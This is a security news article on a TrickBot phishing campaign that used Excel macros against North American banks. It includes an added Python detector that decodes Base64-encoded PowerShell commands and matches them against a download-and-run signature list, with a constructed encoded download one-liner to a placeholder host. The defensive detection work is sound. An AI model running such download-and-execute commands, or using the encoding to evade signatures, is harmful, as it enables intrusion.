A spam-based phishing campaign recently targeted North American banking customers with malicious Excel documents designed to infect victims with a new variant of the information-stealing TrickBot banking trojan, researchers reported earlier this week.
The scam dates back to at least Jan. 27 and peaked in volume on Jan. 30, according to a new blog post from Blue Hexagon, a brand-new deep-learning cybersecurity firm that launched just this past Tuesday, Feb. 5.
Blog authors Irfan Asrar and Mehdi Ansari report that the spam emails featured fake domains that at first glance appear to be from JPMorgan Chase and Bank of America. If recipients were to open the Excel file and enable macros, the document would then download the TrickBot payload, retrieving it from one of several compromised legitimate websites, including the official sites of a Canadian CPA firm and the Jamaica Beach Police Department in Galveston County, Texas. (Blue Hexagon informed site administrators of the compromise.)
“Compared to previous campaigns, there is a distinct shift in tactics,” the blog post states. “There has always been a unique focus on European banks by TrickBot more than North American banks, but after a few days of monitoring, we still have not seen the new campaign move into Europe.”
The version of TrickBot observed in this campaign has evolved from its predecessors in that it is now capable of stealing credentials for cryptocurrency wallets and also uses a different encryption technique to protect the PowerShell used by the malicious macro. “The encryption technique was a slight shift in the use of Base64 encryption, which likely was meant to complicate reverse engineering attempts, not to mention also thwart detection techniques based on signature detection, etc.,” said Asrar, senior threat analyst, in an interview with SC Media.
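The point Asrar makes about Base64 and signature detection is worth seeing concretely: a signature that matches the literal text of a download cmdlet never fires on a Base64-encoded PowerShell command line, but a detector that decodes the `-EncodedCommand` argument before matching does. The following is an added illustration written for this article, not code from Blue Hexagon or from the campaign analysis; the process-creation log lines are constructed here, the URL is a placeholder, and the signature list is a minimal assumed set rather than any vendor's rule.

```python
import base64
import re

def encode_ps(cmd: str) -> str:
    """PowerShell's -EncodedCommand takes UTF-16LE text, Base64-encoded.
    Used here only to build constructed sample log lines."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")

# Constructed sample process-creation log lines (not from the article).
# Line 0: a benign-looking placeholder download one-liner, Base64-encoded.
# Line 1: an ordinary unencoded command. Line 2: a harmless encoded command.
SAMPLE_LOGS = [
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
    + encode_ps("(New-Object Net.WebClient).DownloadString('http://example.invalid/x')"),
    "powershell.exe -Command Get-ChildItem C:\\Users",
    "powershell.exe -enc " + encode_ps("Get-Date"),
]

# PowerShell accepts abbreviated forms of -EncodedCommand; capture the Base64 token.
ENCODED_FLAG = re.compile(r"(?i)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Assumed minimal "download-and-run" signature set for the demonstration.
SUSPICIOUS = re.compile(
    r"(?i)downloadstring|downloadfile|invoke-webrequest|net\.webclient"
    r"|invoke-expression|\biex\b"
)

def decode_encoded_command(line: str):
    """Return the decoded script text if the line carries an encoded command,
    otherwise None. Invalid Base64 or non-UTF-16 payloads also yield None."""
    m = ENCODED_FLAG.search(line)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(line: str):
    """Return (raw_hit, decoded_hit): whether the signature fires on the
    log line as logged, and whether it fires after decoding the argument."""
    raw_hit = bool(SUSPICIOUS.search(line))
    decoded = decode_encoded_command(line)
    decoded_hit = bool(decoded and SUSPICIOUS.search(decoded))
    return raw_hit, decoded_hit

def scan(lines):
    """Classify every line; the difference between the two flags shows what
    a raw-text signature misses."""
    return [classify(line) for line in lines]

if __name__ == "__main__":
    for line, (raw_hit, decoded_hit) in zip(SAMPLE_LOGS, scan(SAMPLE_LOGS)):
        print(f"raw={raw_hit!s:5} decoded={decoded_hit!s:5}  {line[:60]}...")
```

Running it shows the encoded download line is missed by the raw-text match (`raw=False`) and caught only after decoding (`decoded=True`), while the two benign lines fire on neither. The same decode-before-match step applies to other layers the page mentions in spirit, such as a macro that assembles the command from string fragments: the detector has to observe the script at the point where it is in the clear, which is why script-block logging or AMSI-style inspection is generally more robust than matching on the command line alone.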
“Additionally, we see new functionality that appears to target POS systems; this is a testament to the business tactics behind the people running TrickBot. They are always looking to expand the platform to ensure profitability. Definitely not your average cyber criminal.”
Asrar also told SC that Blue Hexagon has since observed another new campaign specifically targeting Canadian banks and their customers. “It would seem TrickBot is further entrenching itself into North America,” said Asrar.